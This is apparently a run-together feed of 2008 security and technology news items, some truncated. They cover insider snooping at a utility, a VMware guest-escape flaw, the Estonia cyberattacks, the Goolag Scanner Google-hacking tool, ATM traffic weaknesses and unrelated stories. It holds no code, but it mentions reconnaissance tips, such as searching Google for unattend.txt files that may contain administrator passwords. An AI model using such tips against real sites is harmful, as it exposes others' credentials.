Protect your reputation with the Remove Hidden Data tool: Maybe you're one of the many Office users who have suffered the embarrassment of sending someone (or a lot of someones) a file that hadn't had its revisions and comments deleted. To minimize the chances of the public seeing more of your files than you intend, download Microsoft's free Remove Hidden Data tool. (I described this program and four other great Office freebies in an earlier post.)

Unknown hackers defaced the Metropolitan Police's careers website over the weekend.

Digital graffiti on metpolicecareers.co.uk featured a picture of a greenish cuddly monster (vaguely resembling Sulley from Monsters Inc) and a message mocking Scotland Yard's anti-terrorism unit.

A lawsuit filed by a woman fired from Wisconsin's largest electric utility for accessing sensitive records has revealed that employees frequently accessed sensitive customer information for their own gain, according to an article published by the Associated Press on Saturday.

Underscoring companies' lax oversight of their workers' access to customers' personal information, the case has revealed that employees at Milwaukee-based WE Energies regularly accessed records that included credit and banking information, payment histories, address and phone numbers, and Social Security numbers, according to the media report. Examples included a woman that often perused information on an ex-boyfriend, a woman who searched for the address of her child's father, and a part-time landlord who investigated prospective tenants. Another worker leaked information on a mayoral candidate's habit of paying heating bills late, possibly affecting the election, the article said.

"People were looking at an incredible number of accounts," Joan Shafer, WE Energies' vice president of customer service, said during a sworn deposition last year, according to the AP report. "Politicians, community leaders, board members, officers, family, friends. All over the place."

While privacy experts have worried about the large number of data breaches reported in the past two years, reports are increasingly coming to light of corporate employees and government workers using their positions of trust to access personal information. Earlier this month, a police officer in Dekalb County, Georgia, was suspended for five weeks for using a classified law-enforcement system to send fliers to the family and friends of a woman dating her husband, from whom she had separated. The fliers had a picture of the woman, the word "Homewrecker" written across the top and verses from the Bible on adultery. Last year, the Internal Revenue Service leveled more than 200 disciplinary actions against federal employees for illicitly accessing the financial information of private citizens, according to an Inspector General report cited by the Associated Press.

While insider threats to corporate data have garnered a great deal of attention, the privacy impact of workers in privileged positions has received less attention.

Core Security Technologies, based in Boston, Mass., announced the discovery of a flaw in VMWare's desktop virtualization software for Windows that could leave companies vulnerable to hackers. The company discovered that a malicious user or software running on a guest system within VMware's desktop software could break out of the isolated environment and gain full access to the host computer system.

"What's most relevant about this vulnerability is it demonstrates how virtual environments can provide an open door to the underlying infrastructures that host them," said Core Security's CTO Ivn Arce. He said organizations often adopt virtualization technologies with the assumption that the isolation between the host and guest systems will improve their security posture, but this discovery acts as a "wake-up call" for IT managers' security.

"It is signals that virtualization is not immune to security flaws and that 'real' environments aren't safe simply because they sit behind virtual environments," he said.

CoreLabs, the research center of Core Security Technologies, discovered the vulnerability affects VMware Workstation, Player and ACE software and it is only exploitable when shared folders are enabled and at least one folder on the host system is configured for sharing. The announcement comes on the eve of VMWare's first annual VMworld Europe conference.

VMWare acknowledged the flaw and has told users to disable shared folders, and said the vulnerability isn't present in its server line because VMware Server and ESX Server do not use shared folders. Core Security also recommended disabling shared folders, or, if the shared folders feature is required, to reconfigure it for read-only access.

This is the second security alert in as many weeks for the Palo Alto-based company. On February 22 VMWare issued patches to fix vulnerabilities in its ESX Server, which could allow hackers to circumvent security controls and view sensitive information.

The growing number of cyber criminals in areas of Asia and Eastern-Europe is the result of a lack of IT jobs for qualified professionals, according to a report from vendor Mcafee.

And the growing trade in malware means that authors can sell their code to other criminals without actually releasing their viruses.

Writing malware is a hard option to ignore, according to Joe Telafici, vice president of operations at Mcafee.

"The motivation to engage in illegal behavior is strong in Eastern Europe where technical skills were widely taught during the Cold War but economic opportunities are limited," he said.

"The same is true in Asia, where population growth has stretched strong economic performance to the limits."

In China, 43 per cent of IT graduates are unemployed, and hacker "training" web sites are creating a pool of effective malware authors and paying them like a legitimate business.

In September last year, Chinese courts sentenced malware author Li Jun, 25, to four years in prison.

Li Jun had graduated from an IT training college and earned three times China's average salary writing malware, despite being offered legitimate positions in the business world.

Service on Google Inc.'s YouTube site was disrupted around the world for several hours Sunday after a botched effort by the Pakistan government to block access to a video clip critical of Islam.

The incident, which is still being investigated by YouTube, underscores the vulnerability of the global communications infrastructure. The unusual circumstances surrounding the breakdown also point to the growing role sites like YouTube have played in spreading politically charged content -- including in Pakistan, a nation that is already a tinderbox of political tensions.

The story began unfolding Friday when the Pakistan Telecommunications Authority, the nation's telecom regulator, ...

Data breaches cost UK companies an average of £47 for every record lost.

This means the average cost to a company which suffers a data breach is £1.4m. The Ponemon Institute isn't pulling these figures out of the ether - it talked to 21 UK companies about how much actual data breaches cost them.

From a total of £47 per record, the cost from lost business in the wake of a data disaster is 36 per cent or £17. Financial services companies are particularly at risk - their average costs per record are £55. Customer expectations of trust mean they also suffer a higher cost of lost business.

Phillip Dunkelberger, CEO at PGP Corporation, told The Reg: "Companies are increasingly waking up to the real cost of data losses, especially the cost of losing customers. It is a serious global problem with no easy answers."

Both PGP and Symantec, who co-sponsored the study, believe some kind of data notification law - where companies are obliged to tell a third party when a breach occurs - could help.

Ponemon estimates customer churn rates to go up by an average of 2.5 per cent after a data loss, but the worst example in the UK saw churn rates go up by seven per cent.

The size of the losses examined ranged from 2,500 records to more than 125,000 and costs ranged from £84,000 to £3.8m.

Breaches by third parties were more expensive than in-house losses - on average £59 rather than £42 in-house. This is a difficult issue for big companies to deal with, because their supply chain will include hundreds or even thousands of partner and outsourcer companies

A H-2A lifts off from its launch pad on the island of Tanagashima on Saturday February 23, 2008. Japan's space agency said Saturday it launched a communications satellite designed to enable super high-speed data transmission. The H-2A rocket carrying the satellite lifted off from the southern island of Tanegashima at 5:55 p.m. (0855 GMT), according to a live Internet broadcast by the Japan Aerospace Exploration Agency. (AP Photo/Kyodo News)

(AP) -- Japan's space agency launched an experimental communications satellite Saturday designed to enable super high-speed data transmission at home and in Southeast Asia.
The domestically developed H-2A rocket carrying the satellite, "Kizuna," was launched Saturday evening from the southern island of Tanegashima, according to a live Internet broadcast by the Japan Aerospace Exploration Agency, known as JAXA.

The satellite, equipped with two large multi-beam antennas, separated from the rocket and successfully entered its intended orbit 175 miles from Earth, JAXA said in a statement.

The agency said it hoped to enable data transmission of up to 1.2 gigabytes per second at a low cost across Japan and in 19 different places in Southeast Asia. JAXA developed Kizuna with another government agency, the National Institute of Information and Communication Technology, and Mitsubishi Heavy Industries, Ltd.

The cost of the satellite's development, launch and operation is estimated at $480 million, JAXA spokeswoman Asaka Hagiwara said.

Japan has yet to join the lucrative international satellite market, and Kizuna, which should be in operation for five years, is not intended for commercial use. Its large H-2A rocket is one of the most advanced and reliable in the world - Saturday's was its eighth straight successful launch.

r Samuel, 35, is a "whitehat" - a "benign" hacker employed to hack into the computer systems of government and businesses to show their weaknesses. To the horror of his clients, it is a task he performs far too easily. If he hadn"t been so busy last week, he was willing to demonstrate techniques to obtain the pin numbers and passwords to a Sunday Telegraph reporter"s HSBC bank account. In England a while back he showed finance experts how to hack into the Bank of England website.

But altogether rather scarier was the stunt he pulled a few weeks ago, when he hacked into the computer system of a European airport (he declines to say which), posting a cartoon film on a television screen in the public lobby for ten minutes. For him, the purpose was to show the airport how easily its supposedly secure computer systems could be compromised. But for a less benevolent hacker, he says, it could have paved the way for a "cyberterrorism" attack.

"If you can hack into an airport you can manage anything," said Mr Samuel. "Even just putting a different message on the monitors could have dangerous - you could have told people there was a bomb about to go off, which would have forced them to shut down the airport for a whole day."

Until now, such nightmare scenarios have largely been only a concern for the likes of Bruce Willis in Die Hard IV, in which an attack on America"s internet systems threatens to crash the country"s stockmarket and power networks. Yet in Estonia, it is no longer the stuff of Hollywood but a reality.

Last April, the former Soviet republic fell victim to a massive cyber attack after row over a decision to relocate a statue of a Red Army soldier from downtown Tallin, a move which infuriated the country"s ethnic Russian minority. As riots ensued, Estonia"s banks and government were paralysed by a massive barrage of spam and hacking: some merely mischievous, such as grafting a Hitler moustache onto prime minister Andrus Alsip"s website photo, others potentially fatal, such as the hack which for a few minutes disabled the country"s emergency services telephone number.

More frightening still, though, was the widespread suspicion that the Russian government - which had backed the protests - was involved, a theory given credence by the co-ordinated nature of the attacks and evidence that some of the sabotage techniques were well beyond the capabilities of ordinary hackers.

"They were intended to destabilise the government and create anxiety and fear," Estonia"s defence minister, Jaak Aaviksoo, told The Sunday Telegraph last week. "It was a form of cyberterrorism."

Be the threat from Russia, al Qaeda, or a James Bond-style criminal mastermind, Estonia now fears that what happened to them last year should now be a wake-up call for the rest of the Western world, where growing dependence on technology also brings growing vulnerability. The country is uniquely well-qualified to comment. Not only have they had real experience of such an attack, they are also one of the most advanced e-societies in the world, having rebuilt their rusting Soviet-era infrastructure virtually from scratch.

In Tallin, a mixture of gleaming new high-rise blocks and cobbled medieval streets, nearly every transaction in life can be done electronically, from e-voting in elections through to paying parking tickets and receiving exam results by SMS text message. Many Estonians nowadays carry barely any cash, paying even for a cup of coffee with an online credit card.

Thanks partly to a formidable array of home-grown computer experts like Mr Samuel, the country managed to fend off the worst of April"s cyberattack. Now, though, the Estonian government is extending its expertise internationally, by converting a Tsarist-era military barracks in Tallin into the first-ever international cyberdefence school for NATO, which it infuriated Russia by joining in 2004. Staffed by around 30 cyberexperts from NATO member states, it will become fully operational later this year.

"Last year"s attack was a dangerous violation of our way of life, where we have tried to create a more effective society through automating the flow of information," said Lieutenant General Johannes Kert, until recently Estonia"s NATO attache. "The centre isn"t just to collect Estonian know-how, but to collect the larger know-how and focus it to the needs of NATO."

Nestling between birch trees as silver as the Baltic winter sky, the squat, Soviet-era brick sentry house that guards the complex - known as "K5" in the Estonian military - looks like just another relic from the Cold War. But inside the barracks, Lt Gen Kert, who started his career in a Soviet armoured unit, is helping co-ordinate military exercises for a much more modern struggle - where the threats may involve not just tanks and missiles, but also the likes of "botnets" - networks of computers that are hijacked in huge numbers by clandestine viruses and then used, robot-like, to launch attacks on a country"s infrastructure from within.

Also known as "zombie armies", they are alarmingly easy to recruit thanks to new developments in software. A clever hacker need do little more than plant a piece a hidden code on a commonly-used website, after which they can "hijack" any computer that visits it. It is thought an estimated million botnet computers were illegally harnessed for the assault on Estonia last year, many of the ordinary PC users in America, Britain and other countries who remained blissfully ignorant of the fact.

In criminal hands, botnets can assist with the mass hacking of peoples" bank accounts, by remotely monitoring which websites the user visits and then using a "keystroke logger" to work out pin codes and passwords typed on the keyboard. In a hostile government"s hands, however, they can be the equivalent of infiltrating a neighbouring country with millions of undercover "cybersoldiers", unleashing them whenever required.

"In the case of weapons systems that are designed to defend countries, you really don"t want your adversary to get hold of the command and control systems," said Kenneth Geers, an American cyberdefence specialist on secondment to the NATO school from the US Naval Criminal Investigative Service. While most governments have special security-encrypted software for military use, he warns, there remains the possibility of a "Cyber 9-11" through attacks on civilian infrastructure.

"I don"t think we have seen the worst of what can happen in cyberspace yet," he said. "We wouldn"t see the end of the world by a long shot, but that doesn"t mean that vital national and critical infrastructure could not be affected."

The convenience which the internet brings to so many walks of life, he says, also applies to the world of cyberterrorism and cybercrime too. The last two years have seen the internet spawn an entire new criminal economy in so-called "malware", software specifically designed for malevolent activities like stealing credit card numbers and secure passwords.

According to Peeter Marvet, another leading Estonian cyberanalyst, many "malware" hackers now sell bespoke products online, also offering 24-7 "techie help" in case it goes wrong, making cybercrime an option not just for computer experts but for criminals and terrorists too. "It is like ordering a suit," said Mr Marvet. "You can buy the toolkits, the software, the service contracts to do whatever you want, say like capturing 80,000 computers to attack a bank."

One such example was the Gozi Trojan, which steals data and sends it to hackers in an encrypted form, sold for around £500 a time by a shadowy consortium of St Petersburg-based cybergangsters called the Russian Business Network. Run by a shadowy individual nicknamed Flyman, the network also offered "bulletproof" hosting for cybercrime groups to keep their operations safe from whitehat hackers.

Flyman, who mysteriously vanished from the internet late last year, is just one of many expert Russian hackers, who, along with the Chinese, are widely considered to be among the best in the business. That has prompted speculation that they may also have backing - tacit or otherwise - from their own countries" intelligence services, who view them as a useful - and deniable - means of probing other countries" internet security.

Whether the Kremlin really was involved in the attack on Estonia last year remains a mystery. Mr Aaviksoo concedes that in virtual reality, no "smoking gun" is left behind, but points out that afterwards, the Russian government declined Estonia"s requests to investigate the many Russian-based internet sites involved in the attacks. "I am not sure that the willingness to co-operate was higher than in the case of (Alexander) Litvinenko," he said, referring to Russia"s refusal to extradite the man accused of poisoning of the former spy in London.

In the meantime, though, the more pressing question is not who did the last attack, but what may they be capable of next time. "It wasn"t an all-out assault, rather than a testing and probing to see how we responded," said Mr Marvet. "We have learned from it, but whoever did it will have learned too."

A hacker group has released Goolag Scanner, a tool that scans Web sites for vulnerabilities.

Over the past few years, cybersecurity professionals have watched as the cinematic cliche of police with pistols being outgunned by thieves with automatic weapons has become applicable to their industry. Increasingly, they find themselves defending against automated attacks that can easily overwhelm the technologically underequipped.

Wednesday saw the debut of the latest such tool, which derives its power from Google (NSDQ: GOOG)'s vast index. That's when the Cult of the Dead Cow, the self-proclaimed "world's most attractive hacker group," released a Web auditing tool called Goolag Scanner.

"It's no big secret that the Web is the platform," said cDc official Oxblood Ruffin, in a statement. "And this platform pretty much sucks from a security perspective. Goolag Scanner provides one more tool for Web site owners to patch up their online properties. We've seen some pretty scary holes through random tests with the scanner in North America, Europe, and the Middle East. If I were a government, a large corporation, or anyone with a large Web site, I'd be downloading this beast and aiming it at my site yesterday. The vulnerabilities are that serious."

To prove that point, Ruffin provided InformationWeek with a list of 11 high-profile U.S. government agency and lab Web sites that had been scanned and found to have what appear to be significant security holes, including satellite access codes, credentials for VPNs and routers, and open proxies. He asked that the information not be published, as the group's intent is not to embarrass government officials or encourage attempts to hack government systems.

The Department of Homeland Security, which Ruffin several weeks ago said was notified of the flaws, did not respond to a request for comment.

Goolag Scanner presently exists only as a Windows application, though it is being ported to other platforms. It allows the user to quickly scan Google's index for files on Web sites that may reveal security vulnerabilities. For example, Goolag Scanner allows you to search Web sites for containing file called "unattend.txt," which is used to drive unattended Microsoft Windows installations. The file may include information useful to hackers, such as administrator passwords.

Goolag Scanner doesn't do anything a hacker or penetration tester couldn't do by typing text into Google and using certain operator commands to constrain the search to a specific domain or file type. But it makes searching for holes much easier.

"The Goolag Scan tool isn't especially innovative in terms of the methods it implements," said Mark Kraynak, senior director of strategic marketing for data protection company Imperva, in an e-mail. "These techniques have been well known in the security community for some time."

What is does do, Kraynak said, is allow less-sophisticated attackers to exploit application and data layer vulnerabilities. "This will result in even more application attacks," he said. "This is bad news, since SQL Injection and Cross-Site Scripting already rank among the most common attacks lodged against online applications. ... The bad guys now have automatic weapons, so as a security community we need to upgrade our defense systems for these new threats."

What that means, in addition to addressing specific vulnerabilities, is defending against search.

As Petko D. Petkov, founder of security consulting firm GnuCitizen, explained in a blog post on Friday, search engines can be used very efficiently to collect information about vulnerabilities, particularly metadata that isn't ordinarily indexed.

Petkov proposes using the Amazon (NSDQ: AMZN) Web Services platform to build a custom search application for identifying vulnerabilities. "By using Amazon's Services and more specifically their Elastic [Compute] Cloud infrastructure, attackers can gain immense scalability, which they can use for their own evil good," he explained. "The cloud allows developers to spawn ritualized instances of any type of operating system, which can be instructed to go through any kind of heavy machine processing task, such as crawling Web sites, port-scanning, etc. The information can be stored on Amazon's Simple Storage Service. The whole package is quite cheap and very affordable."

But for the organization that gets hacked, the expense could be considerable.

Breaking things--that's what the very bright and super curious do; they look beyond the obvious to see what's truly lurking beneath the surface. On Wednesday and Thursday, attendees at Black Hat D.C. 2008 got a window into the latest research being done on Web applications, wireless, and embedded technologies.

On Wednesday, researchers David Hulton and "Steve" showed how with about $1,000 with of equipment they can decrypt A5/1 cellular GSM traffic in less than a hour. Following that, Adam Laurie reprised his popular RFIDiots talk from last year's Black Hat briefings with a new program that allows him to read the data off smart credit cards "hands free."

Perhaps the best new presentation at Black Hat D.C. 2008 took place in the early afternoon. In "Bad sushi: Beating phishers at their own game" researchers Nitesh Dhanjani and Billy Rios relentlessly tracked down the origins of several online phishing sites to reveal, not super-smart ninja hackers, but sloppy coders who cut and paste and even steal from one another. Following that, David Litchfield, a substitute for a canceled talk on VoIP, presented on new Oracle vulnerabilities. Finishing the day was Neal Krawetz, who expanded his talk from Black Hat Las Vegas on image analysis, this time including his research into the veracity of Osama bin Laden's beard in a recent video.

Wednesday night included a social. There was also a speaker from the Washington, D.C.-based Spy Museum with stories of real-life spies.

On Thursday, Tiller Beauchamp and David Weston gave a presentation on DTrace, a security research application that is now available within Mac OS X Leopard and coming soon to various distributions of Linux. Following that, Zac Franklin reprised his previous talk on biometric and token-based access control systems with new information on work access cards. After lunch, talks included Chris Wysopal on classification and detection of backdoors, Jason Larson on SCADA security, and Jon Oberheide on exploiting virtual machine migrations.

Banks and financial institutions are leaving customers' personal details vulnerable to hackers by failing properly to secure their ATMs, according to a new report.

Managed security firm Network Box cited three main threats to ATMs: IP worms, disruption of the IP network and denial of service, and the harvesting of transaction data for malicious purposes.

The company said that ATM security risks have increased because of the changing ways in which they operate.

Many ATMs were built on proprietary hardware, software and communications protocols.

But it is estimated that 70 per cent of current ATMs are based on PC/Intel hardware and commodity operating systems using standard IP networking with some additional peripherals housed in a secure vault-like box.

The report attributes the changes to advantages in cost, performance, flexibility, standardisation and functionality, but points out that these advantages bring increased threats.

In these newer systems the ATM is connected to the payment processor using a TCP/IP connection. However, while the Pin is triple-DES encrypted, the messages themselves are not.

This leaves card numbers, expiry dates, transaction amounts and account balances clearly readable.

A hacker needs only to access some part of the IP network between the IP-ATM and the payment processor to gather the details.

"Most people simply assume that because an ATM is invariably provided by a bank, the transactions and the data being transmitted must be secure," said Mark Webb-Johnson, chief technology officer at Network Box.

"We have already seen how the Nachi worm crossed over into 'secure' networks and infected ATMs for two financial institutions, and SQL Slammer indirectly shutdown 13,000 Bank of America ATMs.

"If banks do not use technology that can provide an effective level of protection it is very likely that more high-profile attacks will follow."

Network Box recommends that all traffic to and from ATM machines should be encrypted, and not just the Pin.

ATM networks should also be separated from the rest of the bank's network, thereby allowing it to be closely monitored and controlled.

* Network Box Report: IP-ATM Security

Internet service providers must take concrete steps to curb illegal downloads or face legal sanctions, the government has said.

The proposal is aimed at tackling the estimated 6m UK broadband users who download files illegally every year.

The culture secretary said consultation would begin in spring and legislation could be implemented "by April 2009".

Representatives of the recording industry, who blame piracy for a slump in sales, welcomed the proposals.

"ISPs are in a unique position to make a difference and in doing so to reverse a culture of creation-without-reward that has proved so damaging to the whole music community over the last few years," said John Kennedy, head of the International Federation of the Phonographic Industry (IFPI).

A spokesperson for the Internet Service Provider's Association (ISPA) said that creating appropriate legislation would be very difficult.

"Any scheme has got to be legal, workable and economically sustainable," the spokesperson told BBC News.

He also said that ISPs were already pursuing self-regulation, which was the government's preferred route.

Privacy issue

"The government has no burning desire to legislate," Andy Burnham, culture secretary, told the Financial Times.

However, he said that the proposals signalled "a change of tone from the government".

Its intentions are outlined in a creative industries strategy paper called Creative Britain: New Talents for the New Economy.

The document is a broad ranging paper that sets out government support for the creative industries.

The document commits the government to consulting on anti-piracy legislation this spring "with a view to implementing it by April 2009", according to the FT.

"We're saying we'll consult on legislation, recognising there are practical questions and legitimate issues," Mr Burnham told the paper.

In particular, any legislation would have to take account of the 2002 E-Commerce Regulations that define net firms as "conduits" which are not responsible for the contents of the traffic flowing across their networks.

European laws on online privacy could also create problems for any new legislation.

Earlier this year it was reported that the government was considering a "three strikes" approach to tackling persistent offenders in the report.

But Mr Burnham denied this was the case and told the FT that the strategy had "never been in the paper".

If the government goes ahead, the UK would be one of the first countries to impose sanctions.

"This is a sea-change in attitude and I believe it is now up to governments elsewhere in Europe and further afield to follow their example," said Mr Kennedy.

Infamous hacking group the Cult of the Dead Cow (cDc) has published a tool that searches for vulnerabilities and private data using carefully-selected Google search queries.

The process of so-called Google hacking is already well known, largely due to the efforts of Johnny "I Hack Stuff" Long, whose presentation on the subject have become a fixture of conferences such as Black Hat. cDc's Goolag Scan allows unskilled hackers or the simply curious to use the same techniques.

cDc is most famous for creating Back Orifice remote administration/back door package for Windows ten years ago. It describes Goolag Scanner as a web auditing tool, allowing users to check their own website for vulnerabilities. Searches can be restricted to an individual domain or extended to an entire top-level domain as desired.

There's nothing in the Windows-based application to stop hackers using the tool, a feature it shares with other utilities and one which makes making value judgements of dual use hacking/auditing tools a tricky business.

Goolag Scan provides 1,500 pre-configured Google search queries in categories such as "vulnerable servers", "sensitive online shopping information" and "files containing juicy information", Heise Security reports. The tool presents its findings in the form of of list of URLs that can be opened directly in a browser.